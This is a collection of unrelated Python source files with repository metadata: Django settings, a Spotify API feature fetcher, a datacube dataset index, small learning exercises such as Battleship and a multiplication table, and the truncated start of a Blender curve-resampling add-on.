| 2011-03-18T18:03:48
| 2011-03-18T18:03:48
| 1,246,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,441
|
py
|
# Copyright (c) 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pybtex.style.template import join
from pybtex.style.names import BaseNameStyle, name_part
class NameStyle(BaseNameStyle):
name = 'plain'
def format(self, person, abbr=False):
r"""
Format names similarly to {ff~}{vv~}{ll}{, jj} in BibTeX.
>>> from pybtex.core import Person
>>> name = Person(string=r"Charles Louis Xavier Joseph de la Vall{\'e}e Poussin")
>>> plain = NameStyle().format
>>> print plain(name).format().plaintext()
Charles Louis Xavier<nbsp>Joseph de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> print plain(name, abbr=True).format().plaintext()
C.<nbsp>L. X.<nbsp>J. de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> name = Person(first='First', last='Last', middle='Middle')
>>> print plain(name).format().plaintext()
First<nbsp>Middle Last
>>> print plain(name, abbr=True).format().plaintext()
F.<nbsp>M. Last
>>> print plain(Person('de Last, Jr., First Middle')).format().plaintext()
First<nbsp>Middle de<nbsp>Last, Jr.
"""
return join [
name_part(tie=True) [person.first(abbr) + person.middle(abbr)],
name_part(tie=True) [person.prelast()],
name_part [person.last()],
name_part(before=', ') [person.lineage()]
]
|
[
"ryanshaw@ischool.berkeley.edu"
] |
ryanshaw@ischool.berkeley.edu
|
32b358403cf8563ce1aad3ed0d74d9abb0359e78
|
c5edd407319c80640ed4e2819838fec94ee7a345
|
/raterz/settings.py
|
31ebd662a31757c7cdfd225ed059c47ef34cb724
|
[
"MIT"
] |
permissive
|
OwenMur21/raterz
|
41abece2ac878932a36367b3e12482a9c34ac68c
|
2e028e1fbb8832d90731fec10d5c3401b543384c
|
refs/heads/master
| 2020-04-01T01:31:08.865849
| 2018-10-17T04:48:41
| 2018-10-17T04:48:41
| 152,741,989
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,577
|
py
|
import os
import django_heroku
import dj_database_url
from decouple import config, Csv
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
# 'HOST': config('DB_HOST'),
# 'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = ['*']
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pro.apps.ProConfig',
'bootstrap3',
'rest_framework',
'rest_framework.authtoken',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'raterz.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'raterz.wsgi.application'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
django_heroku.settings(locals())
|
[
"owenmuriithi@gmail.com"
] |
owenmuriithi@gmail.com
|
1dccfb0f90cf749916c6492d1e8a811a652e9e72
|
39b916e8969712a31195586ba6666744342b0fcf
|
/inheritance.py
|
b94276e67bcb37d6bdd1c591fbef51731a5cbdf0
|
[] |
no_license
|
bhumphris/Inheritance
|
165391f1e4125d63d6fd7bb7447fb3860f52020a
|
e61a833c9b4eb49981fa91db31b53b7f450cfc03
|
refs/heads/master
| 2020-06-13T15:48:09.292442
| 2016-12-02T05:27:28
| 2016-12-02T05:27:28
| 75,363,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
import officeFurniture
def main():
desk = officeFurniture.Desk("Desk", "Metal", 48, 20, 36, 2, "Left", 3, 155.50)
print("Product: " + desk.get_category())
print("Material: " + desk.get_material())
print("Length: " + str(desk.get_length()))
print("Width: " + str(desk.get_width()))
print("Height: " + str(desk.get_height()))
print("Number of Drawers: " + str(desk.get_drawers()))
print("Location of Drawers: " + desk.get_location())
print("Quantity: " + str(desk.get_quantity()))
print("Price: ${:0,.2f}\n".format(desk.get_price()))
print desk
main()
|
[
"noreply@github.com"
] |
bhumphris.noreply@github.com
|
df0a60238544af1eabcce7960d656b63097a4e40
|
d98b0d74639be1b7fdd737b4ddb6938d74157865
|
/mysite/settings.py
|
7e61b134ea0d195d268887d0a08fef0772a4b465
|
[] |
no_license
|
sebastiansilbernagl/djangogirls-blog
|
e70d2d673be67145fc8cc12cde3d7dba5a9e5bf9
|
15df60e2af4dadf01165efe6817dea2f6a7e2c65
|
refs/heads/master
| 2020-05-23T10:14:35.840139
| 2017-01-30T12:52:44
| 2017-01-30T12:52:44
| 80,407,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,232
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4)r8d1vo+6v4a&940f7t53g9cozbz9)(^8cbi--m5qe5hju%2l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'sebsilbernagl.pythonanywhere.com', 'localhost',]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Johannesburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"sebastian.silbernagl@gmail.com"
] |
sebastian.silbernagl@gmail.com
|
797ecbc116b4a0204337d20868dc1e94f0595a59
|
d74cf31046b9cf7d6ea77ab3e9ed1f293beabeb9
|
/charts_analyzer.py
|
b1f4b099e9a0a8ed64b168ca5700f71a0350beed
|
[] |
no_license
|
sampurkiss/song_features
|
789c6ad01455528af3c7c667218301ee8d1312b2
|
6ab81b4059645c143c1be478e335146283e85c73
|
refs/heads/master
| 2020-05-06T20:00:00.832903
| 2019-06-02T03:59:50
| 2019-06-02T03:59:50
| 180,215,794
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,847
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 13:05:13 2019
@author: Sam Purkiss
"""
import os
os.chdir('C:/Users/sam purkiss/Documents/Code/Music/')
import pandas as pd
import spotipy
import re
from spotipy.oauth2 import SpotifyClientCredentials
from credentials import CLIENT_ID,CLIENT_SECRET
#Need to create a credentials file with your spotify api keys
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
names_giving_probs = ['21 savage & metro boomin featuring future',
'21 savage, offset metro boomin ring quavo',
'21 savage, offset metro boomin ring travis scott',
'Dont Trust Me',
'Hit It Again',
'a r rahman & the pussycat dolls featuring nicole scherzinger',
'A Change Is Gonna Come',
'\'N Sync']
def get_music_features(artist_name, song_name):
"""
Spotify API caller to pull features for individual tracks.
Paramaters:
artist_name: name of artist
song_name: song by artist of interest
Returns: Pandas dataframe with variables identified in the API documentation:
https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/
Usage:
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
song_features = get_music_features('the cure','Friday im in love')
"""
#Use these lists to fix common problems in naming conventions
words_to_remove = ['&.+',
'featuring.+',#the .+ is a regex expression that
# will strip off words following the main word.
#Eg "Alvin And The Chipmunks Featuring Chris Classic"
#becomes just "Alvin And The Chipmunks." This is
#necessary because Spotify search often has a hard time
#finding songs with multiple featured artists.
#This may cause an issue where songs that are have versions
#with and without different artists aren't distinguished
#between
'feat..+',
'feat.+',
'with.+',
'(?<= )[\+](?= ).+',
'duet',
'(?<= )[xX](?= )',
#note that this will only strip the x away if there's
#an x with spaces on both sides
"'",
'\*',
"\(",
"\)"
]
words_to_remove_from_songs =["'",
'[a-zA-Z]+(\*)+(?P<named_group>).+(?= )',#used for capturing
#words that are censored eg N***s,
'\([a-zA-Z]+.+\)' #remove any words in brackets
]
artist = artist_name.lower()
song = song_name
for word in words_to_remove:
artist = re.sub(word,'',artist)
for word in words_to_remove_from_songs:
song = re.sub(word,'', song)
#Generate database used to hold returned items
song_details= pd.DataFrame()
try:
query = 'track:%s artist:%s' %(song,artist)
result = spotify.search(q=query)
#Select the first item (assume spotify returns what I want on first result)
first_result = result['tracks']['items'][0]
#From first result, pull specific variables
track_id = first_result['id']
album_id = first_result['album']['id']
artist_id = first_result['artists'][0]['id']
release_date = first_result['album']['release_date']
#Add variables to dataframe
song_details['Performer'] = [artist_name]
song_details['Song'] = [song_name]
song_details['track_id'] = [track_id]
song_details['artist_id'] = [artist_id]
song_details['album_id'] = [album_id]
song_details['release_date'] = [release_date]
song_details['search_query'] = [query]
track_features = spotify.audio_features(tracks=track_id)
if len(track_features)>1:
print('multiple songs are returned for some reason')
track_features = track_features[0]
for key, value in track_features.items():
song_details[key] = [value]
except IndexError: #for few weird ones + cases where song isn't on spotify
print("Search term \"%s\" is giving trouble" %(query))
pass
return(song_details)
|
[
"samuelpurkiss@gmail.com"
] |
samuelpurkiss@gmail.com
|
79db44dd6ae283d024b6f0487e48e369d2b2d272
|
83eadd220a58329ad7fdb6a223dcc02cb9e6dd81
|
/load_discussions.py
|
67d431ff934d2ae0fe8c1580dd8f0a00309eba1c
|
[] |
no_license
|
LironRS/anyway
|
7d49a1d994d3685d62acf6e3435a38c9f58b0c35
|
813283a0c4fe966f1752d0e2e85aa30c6fad7693
|
refs/heads/master
| 2021-01-15T09:09:12.309208
| 2015-05-19T12:21:22
| 2015-05-19T12:21:22
| 35,944,465
| 0
| 0
| null | 2015-05-20T11:42:39
| 2015-05-20T11:42:39
| null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from models import DiscussionMarker
import re
from datetime import datetime
from database import db_session
def main():
parser = argparse.ArgumentParser()
parser.add_argument('identifiers', type=str, nargs='+',
help='Disqus identifiers to create markers for')
args = parser.parse_args()
for identifier in args.identifiers:
m = re.match('\((\d+\.\d+),\s*(\d+\.\d+)\)', identifier)
if not m:
print("Failed processing: " + identifier)
continue
(latitude, longitude) = m.group(1, 2)
marker = DiscussionMarker.parse({
'latitude': latitude,
'longitude': longitude,
'title': identifier,
'identifier': identifier
})
db_session.add(marker)
db_session.commit()
print("Added: " + identifier)
if __name__ == "__main__":
main()
|
[
"daniel.hershcovich@gmail.com"
] |
daniel.hershcovich@gmail.com
|
d591cfa31e9c148bfac88be4aefee2acdd0a8266
|
fc39e431bcf4ead647b3c4a2b8fb8dc772928852
|
/Indoor_Webapp_B/Indoor_Webapp_B/Indoor_Webapp_B/manage.py
|
eec6c95947e4ab94a6f3118584215b324c299e0c
|
[
"BSD-3-Clause"
] |
permissive
|
DavidTF85/IndooeAir-Webapp-B
|
c129414be094c39a00fa397e4eed16dc39f7bb14
|
579f7593116d743e566e16219370c98e2937844b
|
refs/heads/master
| 2020-09-12T08:32:24.099793
| 2019-11-18T05:24:55
| 2019-11-18T05:24:55
| 222,369,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Indoor_Webapp_B.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
DavidTF85.noreply@github.com
|
1da5693613af676b6218173be8e0870435f4b8b1
|
7b695f34ee8a45f7609064ec47e861825f2d96a8
|
/week4/multiplication.py
|
4b2154562589d72befaaa62da3ad7cee1620d82a
|
[] |
no_license
|
deciduously/cmit135
|
de0c151c3642f25ecc6ef76d299d46b7810c753e
|
a74544f529a654e499ef34d6ca1a35c0b5cd71d2
|
refs/heads/master
| 2020-04-19T06:19:55.122853
| 2019-02-28T00:13:41
| 2019-02-28T00:13:41
| 168,014,573
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 827
|
py
|
# multiplication.py pretty prints a multiplication table
# Function to return the number of digits a number n has
def num_digits(n):
# Converts it to a string a counts the length - the math way would work too but this is easy
return len(str(n))
def draw_table(n):
# calculate this outside the loop so we dont run it every iteration
total_size = n*n
for i in range(1, n):
for j in range(1, n):
# Print the product of the indices
current_cell = i*j
# Use the size difference betwene the max value and the current value to determine current cell padding
padding = ' ' * (1 + num_digits(total_size) -
num_digits(current_cell))
print(padding + str(i*j), end="")
print()
# draw with 10
draw_table(10)
|
[
"ben@deciduously.com"
] |
ben@deciduously.com
|
3523fe1ae052b3f169f7bc74db4e83be9b2377c2
|
40afc1f3790099d2d5270503d101f30c71a89f07
|
/usersys/views/user.py
|
d4c9af3172aaa675d041cfa02bcb920867dd7649
|
[] |
no_license
|
fhydralisk/reviewing
|
a3d31af1e8fe8caf2e831b35816d638ac0cadcce
|
7a27f278f85f9fdbcc805b0290f6bbdbb7147609
|
refs/heads/master
| 2020-05-14T23:27:37.229343
| 2019-05-07T12:28:21
| 2019-05-07T12:28:21
| 181,997,119
| 0
| 2
| null | 2019-05-07T07:38:14
| 2019-04-18T01:49:53
|
Python
|
UTF-8
|
Python
| false
| false
| 431
|
py
|
from base.views import WLAPIGenericView
from ..serializers import user as user_serializers
from ..funcs import user as user_funcs
class UserView(WLAPIGenericView):
http_method_names = ['get', 'patch', 'options']
API_SERIALIZER = {
'patch': user_serializers.UserPartialUpdateSerializer
}
RESULT_SERIALIZER = {
'get': user_serializers.UserDetailSerializer
}
FUNC_CLASS = user_funcs.UserFunc
|
[
"fhy14@mails.tsinghua.edu.cn"
] |
fhy14@mails.tsinghua.edu.cn
|
2690dfe618649e308a0dc47ef332ab5e56e29930
|
84c38b838ca74cf80fe276d272537b1b840bfe6d
|
/Battleship.py
|
6ff503cc58f958d7415b052af718a3ad315768e3
|
[] |
no_license
|
Chruffman/Personal-Projects
|
9c385a145e02661cf0dddc76d6f2b5034a6a35f9
|
d271573b4e48c3026d0cc09d4483c218bc3dfa97
|
refs/heads/master
| 2021-01-21T05:17:07.536173
| 2018-07-24T13:37:50
| 2018-07-24T13:37:50
| 83,166,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
# my attempt at the Battleship! assignment from codeacademy.com
from random import randint
board = []
for quadrant in range(6):
board.append(['O'] * 6)
def display_board(board):
for row in board:
print (" ".join(row))
print ("Let's play Battleship!")
display_board(board)
def new_row(board):
return randint(0, len(board) - 1)
def new_col(board):
return randint(0, len(board) - 1)
game_row = new_row(board)
game_col = new_col(board)
print (game_col)
print (game_row)
guess = 0
for guess in range(5):
guess += 1
user_row = int(input("Guess row: "))
user_col = int(input("Guess column: "))
if user_row == game_row and user_col == game_col:
print ("You sunk my battleship! Curses!!")
print ("You win!")
break
else:
if user_row not in range(6) or user_col not in range(6):
print ("Your guess is not even in the ocean. Maybe improve your aim?")
elif board[user_row][user_col] == 'X':
print ("You have already unsuccessfully guessed that sector of the game board.")
else:
if guess == 5:
print ("Game Over.")
else:
print ("You missed my battleship!")
board[user_row][user_col] = 'X'
print ("Guess", guess + 1)
display_board(board)
|
[
"noreply@github.com"
] |
Chruffman.noreply@github.com
|
4ec6a82a97d5f6196307fc39b56522e1fa8b4f01
|
a1e01939dfb63139271b137620f57a55420f8dbe
|
/utils/path_helper.py
|
85715b225a360b44fe77bf61e8fa0ca6a7f65723
|
[
"BSD-3-Clause"
] |
permissive
|
KindRoach/NARRE-Pytorch
|
839becc7128a5875e6dbcab62eafea914b3b7c4f
|
14fec7e623e36350e43d24e2629297ab0d308170
|
refs/heads/master
| 2023-06-01T02:56:03.323533
| 2023-05-22T13:32:23
| 2023-05-22T13:32:23
| 270,171,507
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
from pathlib import Path
ROOT_DIR = Path(__file__).parent.parent
if __name__ == "__main__":
print(ROOT_DIR)
|
[
"kindroach@hotmail.com"
] |
kindroach@hotmail.com
|
7e33879f634aa7e8d75988cebf28a1a0a95922cf
|
9918208c80a3c396d8a1e13783d501d60dbc2050
|
/digitalearthau/index.py
|
184f71b63443c944423a74ab43f21a32af6c40c5
|
[] |
no_license
|
benjimin/digitalearthau
|
2d3010be76fad0d0b6b4854dbbad07e98254b239
|
5098bf3c88627cad78a8caa5ab703c586c17a6f7
|
refs/heads/develop
| 2022-02-27T07:36:16.009689
| 2017-09-14T05:51:27
| 2017-09-14T05:51:27
| 103,460,937
| 0
| 0
| null | 2017-09-13T23:10:15
| 2017-09-13T23:10:15
| null |
UTF-8
|
Python
| false
| false
| 7,353
|
py
|
import collections
import uuid
from datetime import datetime
from typing import Iterable, Optional, Mapping, List
from datacube.index import index_connect
from datacube.index._api import Index
from datacube.model import Dataset
from datacube.scripts import dataset as dataset_script
from datacube.utils import uri_to_local_path
from digitalearthau.utils import simple_object_repr
class DatasetLite:
"""
A small subset of datacube.model.Dataset.
A "real" dataset needs a lot of initialisation: types etc, so this is easier to test with.
We also, in this script, depend heavily on the __eq__ behaviour of this particular class (by id only), and subtle
bugs could occur if the core framework made changes to it.
"""
def __init__(self, id_: uuid.UUID, archived_time: datetime = None) -> None:
# Sanity check of the type, as our equality checks are quietly wrong if the types don't match,
# and we've previously had problems with libraries accidentally switching string/uuid types...
assert isinstance(id_, uuid.UUID)
self.id = id_
self.archived_time = archived_time
@property
def is_archived(self):
"""
Is this dataset archived?
(an archived dataset is one that is not intended to be used by users anymore: eg. it has been
replaced by another dataset. It will not show up in search results, but still exists in the
system via provenance chains or through id lookup.)
:rtype: bool
"""
return self.archived_time is not None
def __eq__(self, other):
if not other:
return False
return self.id == other.id
def __hash__(self):
return hash(self.id)
@classmethod
def from_agdc(cls, dataset: Dataset):
return DatasetLite(dataset.id, archived_time=dataset.archived_time)
def __repr__(self):
return simple_object_repr(self)
class DatasetPathIndex:
"""
An index of datasets and their URIs.
This is a slightly questionable attempt to make testing/mocking simpler.
There's two implementations: One in-memory and one that uses a real datacube.
(MemoryDatasetPathIndex and AgdcDatasetPathIndex)
"""
def iter_all_uris(self, query: dict) -> Iterable[str]:
raise NotImplementedError
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
raise NotImplementedError
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
raise NotImplementedError
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def add_dataset(self, dataset: DatasetLite, uri: str):
raise NotImplementedError
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""Map of all datasets to their uri list. Convenience method for tests"""
raise NotImplementedError
def close(self):
"""Do any clean-up as needed before forking."""
# Default implementation: no-op
pass
class AgdcDatasetPathIndex(DatasetPathIndex):
def __init__(self, index: Index) -> None:
super().__init__()
self._index = index
self._rules = dataset_script.load_rules_from_types(self._index)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uri, in self._index.datasets.search_returning(['uri'], **query):
yield str(uri)
@classmethod
def connect(cls) -> 'AgdcDatasetPathIndex':
return cls(index_connect(application_name='digitalearthau-pathsync'))
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for d in self._index.datasets.get_datasets_for_location(uri=uri):
yield DatasetLite.from_agdc(d)
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
was_removed = self._index.datasets.remove_location(dataset.id, uri)
return was_removed
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
agdc_dataset = self._index.datasets.get(dataset_id)
return DatasetLite.from_agdc(agdc_dataset) if agdc_dataset else None
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
was_removed = self._index.datasets.add_location(dataset.id, uri)
return was_removed
def add_dataset(self, dataset: DatasetLite, uri: str):
path = uri_to_local_path(uri)
for d in dataset_script.load_datasets([path], self._rules):
if d.id == dataset.id:
self._index.datasets.add(d, sources_policy='ensure')
break
else:
raise RuntimeError('Dataset not found at path: %s, %s' % (dataset.id, uri))
def close(self):
self._index.close()
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return dict(
(
DatasetLite(dataset.id),
tuple(dataset.uris)
)
for dataset in self._index.datasets.search()
)
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.close()
class MemoryDatasetPathIndex(DatasetPathIndex):
"""
An in-memory implementation, so that we can test without using a real datacube index.
"""
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
for d in self._records.keys():
if d.id == dataset_id:
return d
return None
def __init__(self):
super().__init__()
# Map of dataset to locations.
self._records = collections.defaultdict(list) # type: Mapping[DatasetLite, List[str]]
def reset(self):
self._records = collections.defaultdict(list)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uris in self._records.values():
yield from uris
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
if dataset not in self._records:
raise ValueError("Unknown dataset {} -> {}".format(dataset.id, uri))
return self._add(dataset, uri)
def _add(self, dataset_id, uri):
if uri in self._records[dataset_id]:
# Not added
return False
self._records[dataset_id].append(uri)
return True
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
if uri not in self._records[dataset]:
# Not removed
return False
# We never remove the dataset key, only the uris.
self._records[dataset].remove(uri)
return True
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for dataset, uris in self._records.items():
if uri in uris:
yield dataset
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return {id_: tuple(uris) for id_, uris in self._records.items()}
def add_dataset(self, dataset: DatasetLite, uri: str):
# We're not actually storing datasets...
return self._add(dataset, uri)
|
[
"jez@stulk.com"
] |
jez@stulk.com
|
86e497f7d8b7f8e601d5bdf3d3d634b51fbc04bf
|
e82b761f53d6a3ae023ee65a219eea38e66946a0
|
/All_In_One/addons/hair_tool/curves_resample.py
|
bbf794543f831be09e4c96a6a4ed9485f74a8093
|
[] |
no_license
|
2434325680/Learnbgame
|
f3a050c28df588cbb3b14e1067a58221252e2e40
|
7b796d30dfd22b7706a93e4419ed913d18d29a44
|
refs/heads/master
| 2023-08-22T23:59:55.711050
| 2021-10-17T07:26:07
| 2021-10-17T07:26:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,061
|
py
|
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Copyright (C) 2017 JOSECONSCO
# Created by JOSECONSCO
import bpy
import math
import numpy as np
from bpy.props import EnumProperty, FloatProperty, BoolProperty, IntProperty, StringProperty
from .resample2d import interpol_Catmull_Rom, get_strand_proportions
class HT_OT_CurvesResample(bpy.types.Operator):
bl_label = "Curve resample"
bl_idname = "object.curve_resample"
bl_description = "Change ammount of points on curve"
bl_options = {"REGISTER", "UNDO"}
hairType: bpy.props.EnumProperty(name="Output Curve Type", default="NURBS",
items=(("BEZIER", "Bezier", ""),
("NURBS", "Nurbs", ""),
("POLY", "Poly", "")))
# bezierRes: IntProperty(name="Bezier resolution", default=3, min=1, max=12)
t_in_y: IntProperty(name="Strand Segments", default=8, min=3, max=20)
uniformPointSpacing: BoolProperty(name="Uniform spacing", description="Distribute stand points with uniform spacing", default=False)
equalPointCount: BoolProperty(name="Equal point count", description="Give all cures same points count \n"
"If disabled shorter curves will have less points", default=False)
onlySelection: BoolProperty(name="Only Selected", description="Affect only selected points", default=False)
def invoke(self, context, event):
particleObj = context.active_object
if particleObj.mode == 'EDIT':
self.onlySelection = True
elif particleObj.mode == 'OBJECT':
self.onlySelection = False
Curve = context.active_object
if not Curve.type == 'CURVE':
self.report({'INFO'}, 'Use operator on curve type object')
return {"CANCELLED"}
self.input_spline_type = Curve.data.splines[0].type
self.hairType = self.input_spline_type # hair type - output spline
if self.input_spline_type == 'NURBS':
